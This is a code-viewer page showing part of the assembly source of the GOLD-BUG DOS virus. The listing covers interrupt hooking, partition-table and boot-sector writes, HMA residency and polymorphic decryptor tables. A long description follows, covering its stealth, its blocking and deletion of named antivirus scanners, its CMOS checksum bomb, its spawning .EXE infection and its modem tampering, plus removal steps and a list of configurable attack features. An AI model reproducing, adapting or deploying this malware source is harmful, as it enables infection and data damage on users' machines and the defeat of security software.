📄 gold-bug.asm
字号:
mov bx,VIRGIN_INT_13_B-SET_INT_OFFSET
call set_interrupt
mov bl,low(VIRGIN_INT_13_A-SET_INT_OFFSET)
call set_interrupt
mov ah,high(WRITE_A_SECTOR)
interrupt_2f endp
;-----------------------------------------------------------------------------
get_set_part proc near
pusha
push es
mov bx,SCRATCH_AREA
mov es,bx
mov dx,HD_0_HEAD_0
inc cx
int NEW_INT_13_LOOP
mov ax,READ_A_SECTOR
int DISK_INT
pop es
popa
another_return: ret
get_set_part endp
;-----------------------------------------------------------------------------
return_to_2f proc near
pop es
pop ds
popa
jmp far ptr original_2f_jmp
return_to_2f endp
;-----------------------------------------------------------------------------
interrupt_10 proc far
int_10_start: pushf
pusha
push ds
push es
push offset a_return+RELATIVE_OFFSET
from_com_code: xor bx,bx
mov ds,bx
or ah,ah
jz set_10_back
mov ax,QUERY_FREE_HMA
int MULTIPLEX_INT
cmp bh,high(MIN_FILE_SIZE+SECTOR_SIZE)
jb another_return
mov ax,ALLOCATE_HMA
int MULTIPLEX_INT
clc
call full_move_w_di
mov dx,offset int_13_start+RELATIVE_OFFSET
call set_13_chain
mov bx,VIRGIN_INT_2F-SET_INT_OFFSET
mov dx,offset interrupt_2f+RELATIVE_OFFSET
call set_interrupt
cmp word ptr ds:[LOW_JMP_10],cx
je set_10_back
push es
push es
mov di,DOS_INT_ADDR
mov bx,INT_21_IS_NOW*ADDR_MUL-SET_INT_OFFSET
call get_n_set_int+ONE_BYTE
pop ds
mov bx,offset old_int_10_21-SET_INT_OFFSET+RELATIVE_OFFSET+ONE_BYTE
call set_interrupt
mov ds,cx
mov ax,DOS_SET_INT+DOS_INT
mov dx,LOW_JMP_21
int INT_21_IS_NOW
pop es
mov bx,dx
mov dx,offset interrupt_21+RELATIVE_OFFSET
mov word ptr ds:[bx],0b450h
mov word ptr ds:[bx+TWO_BYTES],0cd19h
mov word ptr ds:[bx+FOUR_BYTES],05800h+INT_21_IS_NOW
call set_int_10_21
set_10_back: mov di,offset old_int_10_21+RELATIVE_OFFSET+ONE_BYTE
mov bx,LOW_JMP_10-FAR_JUMP_OFFSET
interrupt_10 endp
;-----------------------------------------------------------------------------
get_n_set_int proc near
les dx,dword ptr cs:[di]
jmp short set_interrupt
set_int_10_21: mov byte ptr ds:[bx+FAR_JUMP_OFFSET],FAR_JUMP
set_interrupt: mov word ptr ds:[bx+SET_INT_OFFSET],dx
mov word ptr ds:[bx+CHANGE_SEG_OFF],es
ret
get_n_set_int endp
;-----------------------------------------------------------------------------
IF MULTIPARTITE
set_both_ints proc near
mov bx,(NEW_INT_13_LOOP*ADDR_MUL)-SET_INT_OFFSET
call get_n_set_int+ONE_BYTE
mov bl,low(BIOS_INT_13*ADDR_MUL)-SET_INT_OFFSET
jmp short set_interrupt
set_both_ints endp
ENDIF
;-----------------------------------------------------------------------------
IF EXECUTE_SPAWNED
exec_table db COMMAND_LINE,FIRST_FCB,SECOND_FCB
ENDIF
;-----------------------------------------------------------------------------
IF MODEM_CODE
org PART_OFFSET+001f3h
string db CR,'1O7=0SLMTA'
ENDIF
;-----------------------------------------------------------------------------
org PART_OFFSET+SECTOR_SIZE-TWO_BYTES
partition_sig dw 0aa55h
;-----------------------------------------------------------------------------
org PART_OFFSET+SECTOR_SIZE+TWO_BYTES
file_name db 'DA',027h,'BOYS.COM',NULL
;-----------------------------------------------------------------------------
org PARAMETER_TABLE
dw NULL,NULL,NULL,NULL,NULL,NULL,NULL
db NULL
;-----------------------------------------------------------------------------
IFE MULTIPARTITE
boot_load proc near
push cs
pop es
call full_move_w_si
mov ds,cx
cmp cx,word ptr ds:[NEW_INT_13_LOOP*ADDR_MUL]
jne dont_set_intcd
lds dx,dword ptr ds:[VIRGIN_INT_13_B]
mov ax,DOS_SET_INT+NEW_INT_13_LOOP
int DOS_INT
dont_set_intcd: mov ah,high(GET_DEFAULT_DR)
int DOS_INT
call from_com_code+RELATIVE_OFFSET
mov ax,TERMINATE_W_ERR
int DOS_INT
boot_load endp
ENDIF
;-----------------------------------------------------------------------------
IF POLYMORPHIC
load_it proc near
mov word ptr ds:[si],FILE_SIGNATURE
mov byte ptr ds:[si+TWO_BYTES],FIRST_UNDO_OFF
push bx
xor ax,ax
cli
out 043h,al
in al,040h
mov ah,al
in al,040h
sti
push ax
and ax,0001eh
mov bx,ax
mov ax,word ptr ds:[bx+two_byte_table]
mov word ptr ds:[si+ROTATED_OFFSET+TWO_BYTES],ax
org $-REMOVE_NOP
pop ax
and ax,003e0h
mov cl,FIVE_BITS
shr ax,cl
mov bx,ax
mov al,byte ptr ds:[bx+one_byte_table]
xor al,low(INC_BL)
mov byte ptr ds:[swap_incbx_bl+THREE_BYTES],al
pop bx
jmp com_start
load_it endp
;-----------------------------------------------------------------------------
two_byte_table: mov al,0b2h
xor al,0b4h
and al,0d4h
les ax,dword ptr ds:[si]
les cx,dword ptr ds:[si]
les bp,dword ptr ds:[si]
adc al,0d4h
and al,084h
adc al,084h
adc al,024h
add al,084h
add al,014h
add al,024h
test dl,ah
repz stc
repnz stc
;-----------------------------------------------------------------------------
one_byte_table: int SINGLE_BYTE_INT
into
daa
das
aaa
aas
inc ax
inc cx
inc dx
inc bp
inc di
dec ax
dec cx
dec dx
dec bp
dec di
nop
xchg ax,cx
xchg ax,dx
xchg ax,bp
xchg ax,di
cbw
cwd
lahf
scasb
scasw
xlat
repnz
repz
cmc
clc
stc
ENDIF
;-----------------------------------------------------------------------------
gold_bug endp
cseg ends
end com_code
;-----------------------------------------------------------------------------
Virus Name: GOLD-BUG
Aliases: AU, GOLD, GOLD-FEVER, GOLD-MINE
V Status: New, Research
Discovery: January, 1994
Symptoms: CMOS checksum failure; Creates files with no extension; Modem
answers on 7th ring; BSC but it is hidden; Most virus scanners
fail to run or are Deleted; CHKLIST.??? files deleted.
Origin: USA
Eff Length: 1,024 Bytes
Type Code: SBERaRbReX - Spawning Color Video Resident and Extended HMA
Memory Resident Boot-Sector and Master-Sector Infector
Detection Method: None
Removal Instructions: See Below
General Comments:
GOLD-BUG is a memory-resident multipartite polymorphic stealthing
boot-sector spawning anti-antivirus virus that works with DOS 5 and
DOS 6 in the HIMEM.SYS memory. When an .EXE program infected with the
GOLD-BUG virus is run, it determines if it is running on an 80186 or
better, if not it will terminate and not install. If it is on an
80186 or better it will copy itself to the partition table of the hard
disk and remain resident in memory in the HMA (High Memory Area) only
if the HMA is available, ie. DOS=HIGH in the CONFIG.SYS file else no
infection will occur. The old partition table is moved to sector 14
and the remainder of the virus code is copied to sector 13. The virus
then executes the spawned associated file if present. INT 13 and
INT 2F are hooked into at this time but not INT 21. The spawning
feature of this virus is not active now.
When the computer is rebooted, the virus goes memory resident in the
color video memory. Also at this time the GOLD-BUG virus removes
itself from the partition table and restores the old one back. Unlike
other boot-sector infectors, it does not use the top of memory to
store the code. CHKDSK does not show a decrease in available memory.
At this time it only hooks INT 10 and monitors when the HMA becomes
available. Once DOS moves into the HMA, then GOLD-BUG moves into the
HMA at address FFFF:FB00 to FFFF:FFFF. If the HMA never becomes
available, ie. DOS loaded LOW or the F5 key hit in DOS 6 to bypass the
CONFIG.SYS, then the virus clears itself from the system memory when
the computer changes into graphics mode. If it moves to the HMA, it
hooks INT 13, INT 21 and INT 2F and then rewrites itself back to the
partition table. The GOLD-BUG virus also has some code that stays
resident in the interrupt vector table to always make the HMA
available to the virus. The full features of the virus are now
active.
The GOLD-BUG virus will infect the boot sector of 1.2M diskettes.
The virus copies itself to the boot sector of the diskette and moves
a copy of the boot sector to sector 28 and the remainder of the code
is copied to sector 27. These are the last 2 sectors of the 1.2M disk
root directory. If there are file entries on sector 27 or 28 it will
not overwrite them with the virus code. It will infect 1.2M disks in
drive A: or B: If a clean boot disk is booted from drive A: and you
try to access C: you will get an invalid drive specification.
The boot-sector infection is somewhat unique. If the computer is
booted with a disk that contains the GOLD-BUG virus, it will remain in
video memory until the HMA is available and then infect the hard disk.
Also at this time, it will remove itself from the 1.2M disk. The
virus will never infect this disk again. It makes tracking where you
got the virus from difficult in that your original infected disk is
not infected anymore.
If an .EXE file less than 64K and greater then 1.5K is executed,
GOLD-BUG will randomly decide to spawn a copy of it. The .EXE file is
renamed to the same file name with no extension, ie. CHKDSK.EXE
becomes CHKDSK. The original file attributes are then changed to
SYSTEM. An .EXE file with the same name is created. This .EXE file
has the same length, file date and attributes as the original .EXE
file. This spawning process will not make a copy on a diskette
because it might be write protected and be detected; but it will make
a spawn .EXE file on a network drive. When a spawned file is created,
CHKLIST.??? of the current directory is also deleted. The .EXE file
that is created is actually a .COM file; it has no .EXE header.
The GOLD-BUG virus is very specific as to what type of .EXE files it
will spawn copies. It will not spawn any Windows .EXE files or any
other .EXE files the use the new extended .EXE header except those
that use the PKLITE extended .EXE header. This way all Windows
programs will continue to run and the virus will still be undetected.
The GOLD-BUG virus is also Polymorphic. Each .EXE file it creates
only has 2 bytes that remain constant. It can mutate into 128
different decryption patterns. It uses a double decryption technique
that involves INT 3 that makes it very difficult to decrypt using a
debugger. The assembly code allowed for 512 different front-end
decrypters. Each of these can mutate 128 different ways.
The GOLD-BUG virus incorporates an extensive steathing technique. Any
time the hard disk partition table or boot sector of an infected
diskette is examined, the copy of the partition table or boot sector
is returned. If a spawned .EXE file is opened to be read or executed;
the GOLD-BUG virus will redirect to the original file. Windows 3.1
will detect a resident boot-sector virus if the "Use 32 Bit Access" is
enabled on the "Virtual Memory" option. GOLD-BUG will disconnect
itself from the INT 13 chain when Windows installs and reconnect when
Windows uninstalles to avoid being detected. When Windows starts, the
GOLD-BUG virus will copy the original hard disk partition table back.
When Windows ends, the GOLD-BUG virus will reinfect the partition
table.
The GOLD-BUG virus also has an extensive anti-antivirus routine. It
can install itself with programs like VSAFE.COM and DISKMON.EXE
resident that monitor changes to the computer that are common for
viruses. It writes to the disk using the original BIOS INT 13 and not
the INT 13 chain that these types of programs have hooked into. It
hooks into the bottom of the interrupt chain rather than changing and
hooking interrupts; very similar to the tunneling technique. If the
GOLD-BUG virus is resident in memory, any attempts to run most virus
scanners will be aborted. GOLD-BUG stops any large .EXE file
(greater than 64k) with the last two letters of "AN" to "AZ". It will
stop SCAN.EXE, CLEAN.EXE, NETSCAN.EXE, CPAV.EXE, MSAV.EXE, TNTAV.EXE,
etc., etc. The SCAN program will either be deleted or an execution
error will return. Also, GOLD-BUG will cause a CMOS checksum failure
to happen next time the system boots. GOLD-BUG also erases
"CHKLIST.???" created by CPAV.EXE and MSAV.EXE. Programs that do an
internal checksum on themselves will not detect any changes. The
Thunder Byte Antivirus programs contain a partition table program that
claims it can detect all partition table viruses. GOLD-BUG rides
right through the ThunderByte partition virus checker.
The GOLD-BUG virus detects a modem. If you received an incoming call
on the modem line, GOLD-BUG will output a string that will set the
modem to answer on the seventh ring.
If a program tries to erase the infected .EXE file, the original
program and not the infected .EXE file is erased.
The text strings "AU", "1O7=0SLMTA", and "CHKLIST????" appear in the
decrypted code. The virus gets it name from "AU", the chemical
element "GOLD". The text string "CHKLIST????" is actually executable
code.
The GOLD-BUG virus has two companion viruses that it works with. The
DA'BOYS virus is also a boot-sector infector. It is possible to have
a diskette with two boot-sector viruses. GOLD-BUG hides the presence
of the DA'BOYS virus from the Windows 3.1 startup routine. GOLD-BUG
removes the DA'BOYS virus from the INT 13 chain at the start of
Windows and restores it when Windows ends. The GOLD-BUG virus works
with the XYZ virus; it reserves the space FFFF:F900 to FFFF:FAFF in
the HMA for the XYZ virus so it can load as well.
To remove the GOLD-BUG virus, change DOS=HIGH to DOS=LOW in the
CONFIG.SYS, then reboot. Once the system comes up again, reboot from
a clean boot disk. The Virus has now removed itself from the
partition table and memory. With the ATTRIB command check for files
with the SYSTEM bit set that don't have any extension. Delete the
.EXE file associated with the SYSTEM file. Using ATTRIB remove the
SYSTEM attribute. Rename the file with no extension to an .EXE file.
Format each diskette or run SYS to remove the virus from the boot
sector of each 1.2M disk. Any spawned .EXE files copied to diskette
need to be deleted.
Several variations of this virus can exist. The assembly code allowed
for 14 features to be turned on or off: Delete Scanners, Check for
8088, Infect at Random, Deflect Delete, CMOS Bomb, File Reading
Stealth, Same File Date, Double Decryption, Execute Spawned, Modem
Code, Anti-Antivirus, Polymorphic, Multipartite and 720K or 1.2M
Diskette Infection. Some of these features can be disabled and more
code added to change the characteristics of this virus.
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -